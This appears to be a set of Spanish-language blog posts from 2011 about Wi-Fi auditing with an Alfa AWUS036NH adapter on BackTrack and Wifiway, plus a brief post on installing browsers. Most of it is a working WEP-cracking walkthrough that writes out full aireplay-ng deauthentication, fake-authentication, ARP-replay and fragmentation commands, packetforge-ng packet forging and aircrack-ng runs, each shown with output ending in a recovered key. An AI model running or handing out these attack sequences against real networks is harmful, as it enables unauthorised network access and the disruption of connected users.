root@bt:~# aireplay-ng --deauth 10 -a 00:18:3F:18:85:C9 -c 0C:60:76:71:D5:5B mon0
02:27:39  Waiting for beacon frame (BSSID: 00:18:3F:18:85:C9) on channel 6
02:27:39  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [34|63 ACKs]
02:27:40  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [17|64 ACKs]
02:27:41  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [12|64 ACKs]
02:27:41  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [12|64 ACKs]
02:27:42  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [12|64 ACKs]
02:27:43  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [13|63 ACKs]
02:27:43  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [22|65 ACKs]
02:27:44  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [18|64 ACKs]
02:27:45  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [16|64 ACKs]
02:27:45  Sending 64 directed DeAuth. STMAC: [0C:60:76:71:D5:5B] [14|64 ACKs]
root@bt:~#
El numero 10 es el número de deautenticaciones a enviar. Una vez desasociado el cliente lanzamos el ataque 3 para generar nuevos IVs (vectores de inicialización).

Ataque 3: ARP-Request

Lanzamos el ataque 3 (ARP-request reinjection) de aireplay-ng para aumentar la velocidad de captura de los IVs (vectores de inicialización).

root@bt:~# aireplay-ng --arpreplay -e WifiAttack -b 00:18:3F:18:85:C9 -h 0C:60:76:71:D5:5B mon0
The interface MAC (00:C0:CA:4A:82:97) doesn't match the specified MAC (-h).
ifconfig mon0 hw ether 0C:60:76:71:D5:5B
02:28:07  Waiting for beacon frame (BSSID: 00:18:3F:18:85:C9) on channel 6
Saving ARP requests in replay_arp-0318-022807.cap
You should also start airodump-ng to capture replies.
Read 81421 packets (got 27178 ARP requests and 26333 ACKs), sent 29719 packets...(49
root@bt:~#
Lo que sucede en este paso es, que areplay-ng escucha hasta encontrar un paquete ARP y cuando encuentra este paquete lo que hace es retransmitirlo hacia el punto de acceso, esto provoca que el AP tenga que repetir el paquete ARP con un IV nuevo y al retransmitir y retransmitir los paquetes ARP tendremos mas IVs que nos permitirán averiguar la clave WEP.

Cuando ya tengamos suficientes paquetes de datos (#Data) lanzamos aircrack-ng para crackear la Clave WEP. Abrimos consola y ejecutar aircrack-ng con el nombre del archivo guardado, en este caso es captura-01.cap

root@bt:~# aircrack-ng captura-01.cap
Opening captura-01.cap
Read 86840 packets.

#  BSSID              ESSID                     Encryption

1  00:18:3F:18:85:C9  WifiAttack                WEP (19315 IVs)

Choosing first network as target.

Opening captura-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 19477 ivs.

                                  Aircrack-ng 1.1 r1738

                     [00:00:00] Tested 4 keys (got 19189 IVs)

 KB    depth   byte(vote)
 0    0/  1    76(26624) 1E(26112) 4D(25088) E6(24576) A5(24064) 25(23808) 36(23808
 1    0/  2    53(26368) 78(26112) 92(24832) BD(24320) 1A(23808) 0B(23552) 59(23552
 2    0/  2    95(25856) C1(25856) 3E(25088) BB(24064) DD(24064) BF(23296) ED(23296
 3    0/  1    92(27392) 40(25088) 08(24576) 45(23808) 8F(23808) 20(23296) 97(23296
 4    0/  1    80(27392) F2(26112) 46(24832) 4D(24576) 71(24576) 0E(24320) 85(24064

                       KEY FOUND! [ 76:02:95:92:80 ]
       Decrypted correctly: 100%

Alfa 2W (AWUS036NH) en Wifiway 2.0.1 (Paso a Paso)

El alfa 2W (AWUS036NH) es soportado en la nueva versión de Wifiway 2.0.1, al conectarla automáticamente la reconoce, y soporta modo monitor. En este post se muestra paso a paso el proceso de como realizar una auditoria wifi con el Alfa AWUS036NH 2000MW.

Estos pasos los realice desde VMware, donde tengo instalado Wifiway 2.0.1. Para ver como es el proceso de instalación de Wifiway 2.0.1 en VMware, lo pueden ver en este post.
Lo primero que aremos es poner un iwconfig en consola, para ver si Wifiway reconoce nuestra alfa 2W, tal como se muestra a continuación.
wifiway ~ # iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11bgn  ESSID:off/any
         Mode:Managed  Access Point: Not-Associated   Tx-Power=7 dBm
         Retry  long limit:7   RTS thr:off   Fragment thr:off
         Encryption key:off
         Power Management:on
Como podemos, Wifiway lo reconoce automáticamente. Así que nuestro segundo paso es ponerlo en modo Monitor. El modo monitor es un modo especial que se usa para capturar paquetes wireles 802.11. Para esto iniciamos el script airmon-ng tal como se muestra a continuación.
wifiway ~ # airmon-ng start wlan0

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
3375    dhcpcd
Process with PID 3304 (dhcpcd) is running on interface wlan0

Interface       Chipset         Driver

wlan0           Ralink RT2870/3070      rt2800usb - [phy0]
                       (monitor mode enabled on mon0)
wifiway ~ #
Una vez que hemos puesto el alfa en modo monitor, podremos lanzar airodump-ng para escanear las redes que están a nuestro alcance para poder elegir un objetivo y centrarnos en una red en concreto.
wifiway ~ # airodump-ng mon0

CH 12 ][ Elapsed: 4 s ][ 2011-02-27 03:32

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

5C:4C:A9:XX:XX:XX  -80        0        0    0  11  54e  WEP  WEP         AGUXX
00:18:3F:XX:XX:XX  -24        4       55   27   6  54 . WEP  WEP         2WIREXXX

BSSID              STATION            PWR   Rate    Lost  Packets  Probes
Una vez elegido el objetivo, lanzamos el siguiente comando para decirle a airodump-ng que escuche con nuestro dispositivo USB (mon0) en el canal (6) donde esta trasmitiendo el punto de acceso (00:18:3F:XX:XX:XX).
wifiway ~ # airodump-ng --bssid 00:18:3F:XX:XX:XX -c 6 -w captura mon0
Con el parámetro --bssid indicamos la dirección MAC del punto de acceso, -c indicamos el numero de canal y el parámetro -w ponemos el nombre del archivo donde se guardaran los datos. Hecho lo anterior podremos ver las redes que están en nuestro alcance, tal como se muestra a continuación.
CH  6 ][ Elapsed: 1 min ][ 2011-02-27 03:35

BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

00:18:3F:XX:XX:XX  -24  94      741     2922  368   6  54 . WEP  WEP    OPN  2WIRE6743

BSSID              STATION            PWR   Rate    Lost  Packets  Probes

00:18:3F:XX:XX:XX  00:C0:CA:XX:XX:XX    0    0 - 1     58     6394
00:18:3F:XX:XX:XX  0C:60:76:XX:XX:XX  -14   54 -54      0       5
Ahora lo que haremos es realizar una falsa autenticación con el Punto de Acceso Wifi para que acepte cualquier paquete que le enviemos. Para esto, en consola realizamos lo siguiente.
wifiway ~ # aireplay-ng -e 2WIREXXX -a 00:18:3F:XX:XX:XX -h 00:c0:XX:XX:XX:XX -1 0 mon0
03:34:44  Waiting for beacon frame (BSSID: 00:18:3F:XX:XX:XX) on channel 6

03:34:44  Sending Authentication Request (Open System) [ACK]
03:34:44  Authentication successful
03:34:44  Sending Association Request [ACK]
03:34:44  Association successful :-) (AID: 1)
Tal como podemos ver, nos hemos asociado correctamente. Ahora, como nuestra alfa AWUS036NH 2000MW si que soporta la inyección de paquetes, lanzamos el ataque 3 (ARP-request reinjection) de aireplay-ng para aumentar la velocidad de captura de los IVs (vectores de inicialización).

Lo que sucede en este paso es, que areplay-ng escucha hasta encontrar un paquete ARP y cuando encuentra este paquete lo que hace es retransmitirlo hacia el punto de acceso, esto provoca que el AP tenga que repetir el paquete ARP con un IV nuevo y al retransmitir y retransmitir los paquetes ARP tendremos mas IVs que nos permitirán averiguar la clave WEP.
wifiway ~ # aireplay-ng -e 2WIREXXX -b 00:18:3F:XX:XX:XX -h 00:c0:ca:XX:XX:XX -3 mon0
03:34:54  Waiting for beacon frame (BSSID: 00:18:XX:XX:XX:XX) on channel 6
Saving ARP requests in replay_arp-0227-033454.cap
You should also start airodump-ng to capture replies.
Read 6930 packets (got 1968 ARP requests and 1963 ACKs), sent 1989 packets...(499 pps)
Ahora solo toca esperar a que tengamos suficientes paquetes de datos (#Data) para ejecutar aircrack-ng para crackear la Clave WEP.

Una vez que ya tengamos suficientes "datas" ejecutamos aircrack-ng para crackear la clave WEP. Abrimos consola y ejecutar aircrack-ng con el nombre del archivo guardado, en este caso es captura-01.cap
wifiway ~ # aircrack-ng captura-01.cap
Opening captura-01.cap
Read 114810 packets.

#  BSSID              ESSID                     Encryption

1  00:18:3F:XX:XX:XX  2WIREXXX                 WEP (25944 IVs)

Choosing first network as target.

Opening captura-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 26149 ivs.

                            Aircrack-ng 1.1 r1734


            [00:00:00] Tested 8 keys (got 25979 IVs)

KB    depth   byte(vote)
0    2/  4   5E(32768) 76(31488) D1(31488) 1C(31232) ED(31232) 58(30976)
1    0/  1   02(35072) 7A(33024) E0(32768) 5B(32512) 8E(32256) 92(31488)
2    0/  1   95(36864) BC(33280) 0E(32256) DB(32000) 54(31488) 5F(31488)
3    0/  1   92(38656) 1E(34816) 8C(33280) C5(32512) 44(32256) DE(32256)
4    0/  2   80(35328) 3E(34048) 84(32512) 54(32256) EB(32256) 8F(30976)

                KEY FOUND! [ 76:02:95:92:80 ]
Decrypted correctly: 100%
Happy hacking wireless con el alfa AWUS036NH 2000MW...
Este vídeo muestra como auditar con el alfa 2W AWUS036NH utilizando BackTrack 4 R2, soporta diferentes tipos de ataque, el ataque chopchop, el ataque de fragmentación y en cuanto a inyección de trafico es excelente. Mi idea era utilizarlo solo para conectarme al router, ya que la mayoría de las personas que la poseían mencionaban que no soportaba modo monitor, soportaba con una live cd llamada beini. Pero como muestro en el video, BackTrack 4 R2 la reconoce automáticamente y si que soporta modo monitor, sin instalar ninguna parche o driver adicional.

En el vídeo se muestra el ataque de fragmentación (5), mostrado tambien en el post anterior.

Vídeo Online
http://www.youtube.com/watch?v=bpnKF1XBr1g

Ataque de Fragmentación con Alfa 2000mw (AWUS036NH)
http://delfirosales.blogspot.com/2011/02/alfa-2w-modo-monitor-awus036nh.html

Alfa 2w Modo Monitor (AWUS036NH - rt2800usb)

El alfa 2000mw soporta modo monitor en BackTrack 4 r2 sin instalar nada de nada, automáticamente la reconoce con el driver rt2800usb. El alfa 2w me llego ayer mismo, lo primero que hice es averiguar si soportaba modo monitor y como podrán ver en este post, si que soporta. En cuanto a inyección es brutal!!, arriba de los 500 datas por segundo.
root@bt:~# airmon-ng

Interface       Chipset         Driver

wlan0           Ralink RT2870/3070      rt2800usb - [phy0]

root@bt:~#
Iniciamos airmon-ng
root@bt:~# airmon-ng start wlan0

Found 1 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!

PID     Name
6179    dhclient
6179    dhclient

Interface       Chipset         Driver

wlan0           Ralink RT2870/3070      rt2800usb - [phy0]
                        (monitor mode enabled on mon0)

root@bt:~#
Ahora lo tenemos en modo monitor, listo para empezar auditar!!
root@bt:~# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11bgn  ESSID:off/any
    Mode:Managed  Access Point: Not-Associated   Tx-Power=7 dBm
    Retry  long limit:7   RTS thr:off   Fragment thr:off
    Encryption key:off
    Power Management:on

mon0      IEEE 802.11bgn  Mode:Monitor  Tx-Power=7 dBm
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

root@bt:~#
Iniciamos airodump-ng para mirar un objetivo.
 CH  6 ][ Elapsed: 4 s ][ 2011-02-26 13:16

BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

5C:4C:A9:XX:XX:XX   33        3        0    0  11  54e  WEP  WEP         GUSAB
5C:4C:A9:XX:XX:XX   33        4        0    0   1  54e  WEP  WEP         INFINITUMcb9
00:18:3F:XX:XX:XX    6        5        0    0   6  54 . WEP  WEP         2WIRE6743

BSSID              STATION            PWR   Rate    Lost  Packets  Probes
Una vez escogido el objetivo, lanzamos airodump-ng.
root@bt:~# airodump-ng --bssid 00:18:3F:XX:XX:XX -c 6 -w captura mon0
Lanzado airodump-ng, ahora toca asociarnos con el objetivo.
root@bt:~# aireplay-ng -e 2WIRE6743 -a 00:18:3F:XX:XX:XX -h 00:C0:CA:XX:XX:XX -1 0 mon0
13:19:11  Waiting for beacon frame (BSSID: 00:18:3F:XX:XX:XX) on channel 6

13:19:11  Sending Authentication Request (Open System) [ACK]
13:19:11  Authentication successful
13:19:11  Sending Association Request [ACK]
13:19:11  Association successful :-) (AID: 1)
Como puede ver, con el alfa 2w asocio a la primera y eso que el router estaba muy distante y con muchos obstáculos. Ahora solo lanzamos cualquier ataque con el areplay-ng, en mi caso lance el ataque de fragmentación (ataque 5).
root@bt:~# aireplay-ng -5 -b 00:18:3F:XX:XX:XX  -h 00:C0:CA:XX:XX:XX mon0

13:19:20  Waiting for beacon frame (BSSID: 00:18:3F:XX:XX:XX) on channel 6
13:19:20  Waiting for a data packet...

Size: 68, FromDS: 1, ToDS: 0 (WEP)

      BSSID  =  00:18:3F:XX:XX:XX
  Dest. MAC  =  FF:FF:FF:FF:FF:FF
 Source MAC  =  00:18:3F:XX:XX:XX

0x0000:  0842 3a01 ffff ffff ffff 0018 3f18 85c9  .B:.........?...
0x0010:  0018 3f18 85c9 6076 c7c0 3f00 3130 92ea  ..?...`v..?.10..
0x0020:  f56f eb33 e447 71e0 3365 0e61 e8f1 dd2a  .o.3.Gq.3e.a...*
0x0030:  1246 669b bf66 bd76 e9dd 234a b45d 9327  .Ff..f.v..#J.].'
0x0040:  4642 6ad2                                FBj.

Use this packet ? y

Saving chosen packet in replay_src-0226-131920.cap
13:19:22  Data packet found!
13:19:22  Sending fragmented packet
13:19:22  Got RELAYED packet!!
13:19:22  Trying to get 384 bytes of a keystream
13:19:22  Got RELAYED packet!!
13:19:22  Trying to get 1500 bytes of a keystream
13:19:22  Got RELAYED packet!!
Saving keystream in fragment-0226-131922.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream
root@bt:~#
Y como pueden ver es totalmente soportado y la inyeccion es brutal!!. Una vez generado el archivo PRGA (del ingles “pseudo random generation algorithm” o algoritmo de generación seudo aleatoria) con extención ".xor", usaremos packetforge-ng para crear un paquete arp. Nuestro objetivo es que el punto de acceso reenvie continuamente el paquete arp inyectado. Cuando lo reenvie obtendremos un nuevo IV (vector de inicialización). Todos estos IVs los usaremos para obtener la clave WEP.
root@bt:~# packetforge-ng -0 -a 00:18:3F:XX:XX:XX -h 00:C0:CA:XX:XX:XX -k 255.255.255.255 -l 255.255.255.255 -y fragment-0226-131922.xor -w ARP
Wrote packet to: ARP
Inyección del paquete ARP con areplay-ng.
root@bt:~# aireplay-ng -2 -r ARP mon0
No source MAC (-h) specified. Using the device MAC (00:C0:CA:XX:XX:XX)

Size: 68, FromDS: 0, ToDS: 1 (WEP)

      BSSID  =  00:18:3F:XX:XX:XX
  Dest. MAC  =  FF:FF:FF:FF:FF:FF
 Source MAC  =  00:C0:CA:XX:XX:XX

0x0000:  0841 0201 0018 3f18 85c9 00c0 ca4a 8297  .A....?......J..
0x0010:  ffff ffff ffff 8001 c7c0 4300 1018 b7e1  ..........C.....
0x0020:  6cde c857 5ad1 d077 a046 b99e 35b7 98fa  l..WZ..w.F..5...
0x0030:  5f01 7c1c 5afb 7836 bc01 eaa3 f9f8 b69e  _.|.Z.x6........
0x0040:  02ca b6ee                                ....

Use this packet ? y

Saving chosen packet in replay_src-0226-131938.cap
You should also start airodump-ng to capture replies.
En el anterior paso habrán bien los ojos! y miren como inyecta el alfa 2000mw. Por ultimo lanzamos aircrack-ng para obtener la clave WEP.
root@bt:~# aircrack-ng captura-01.cap
Opening captura-01.cap
Read 106515 packets.

#  BSSID              ESSID                     Encryption

1  00:18:3F:XX:XX:XX  2WIRE6743                 WEP (32632 IVs)

Choosing first network as target.

Opening captura-01.cap
Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 32822 ivs.

                         Aircrack-ng 1.1 r1738


         [00:00:00] Tested 258 keys (got 32812 IVs)

KB    depth   byte(vote)
0   30/ 33   92(36096) 62(35840) 76(35840) 84(35840) BC(35840)
1    0/  1   02(47616) 6A(41216) E8(40704) 03(40192) D3(40192)
2    0/  4   95(44544) 9A(42496) 44(39936) 31(39680) 15(38912)
3    0/  2   92(45568) F4(40704) 05(40448) 86(40448) 35(39424)
4    0/  1   80(48896) 1E(40192) 7A(39936) 16(39424) 94(39424)

                 KEY FOUND! [ 76:02:95:92:80 ]
Decrypted correctly: 100%

root@bt:~#
Sin duda me sorprendi, ya que antes de comprar el alfa, donde quiera habia leido que no servia para auditoria, pero ya ven si que sirve. Ha sido mi mejor adquisicion, para mi es la mejor de todas, tengo otros tres dipositivos USB, el WifiSky, el Kasens G5000 y el dragon FL-2016G pero sin duda puedo decir que barre con las tres!

Saludos y ahora que me entreguen mi camara lestomare unas fotitos para compartirlo con todos y platicarles el precio y los detalles de esta nueva adquisición.

Update:
Por cierto ya estan las primeras imagenes de BackTrack 5 !!!

Instalar Chrome y Actualizar Firefox en BackTrack 4 R2

Para actualizar firefox primero descargaremos Ubuntuzilla (firefox-mozilla-build_3.6.13-0ubuntu1_i386.deb) del siguiente enlace. http://sourceforge.net/projects/ubuntuzilla/files/mozilla/apt/pool/main/f/firefox-mozilla-build/ O directamente http://cdnetworks-us-1.dl.sourceforge.net/project/ubuntuzilla/mozilla/apt/pool/main/f/firefox-mozilla-build/firefox-mozilla-build_3.6.13-0ubuntu1_i386.deb
Una vez descargado ejecutamos el siguiente comando.
dpkg -i firefox-mozilla-build_3.6.13-0ubuntu1_i386.deb
Al finalizar podemos ejecutar firefox y veremos que estará actualizado.
Instalar Googlr Chrome en Backtrack 4 R2

Descargamos Chrome (google-chrome-stable_current_i386.deb)
http://www.google.com/chrome?hl=es-419
https://dl-ssl.google.com/linux/direct/google-chrome-stable_current_i386.deb

Una vez descargado, el comando para instalar google chrome es el mismo.
dpkg -i google-chrome-stable_current_i386.deb
Finalizado esto, podremos encontrar Google Chrome desde el Menu Internet - Google Chrome.


Google Chrome instalado y Firefox Actualizado.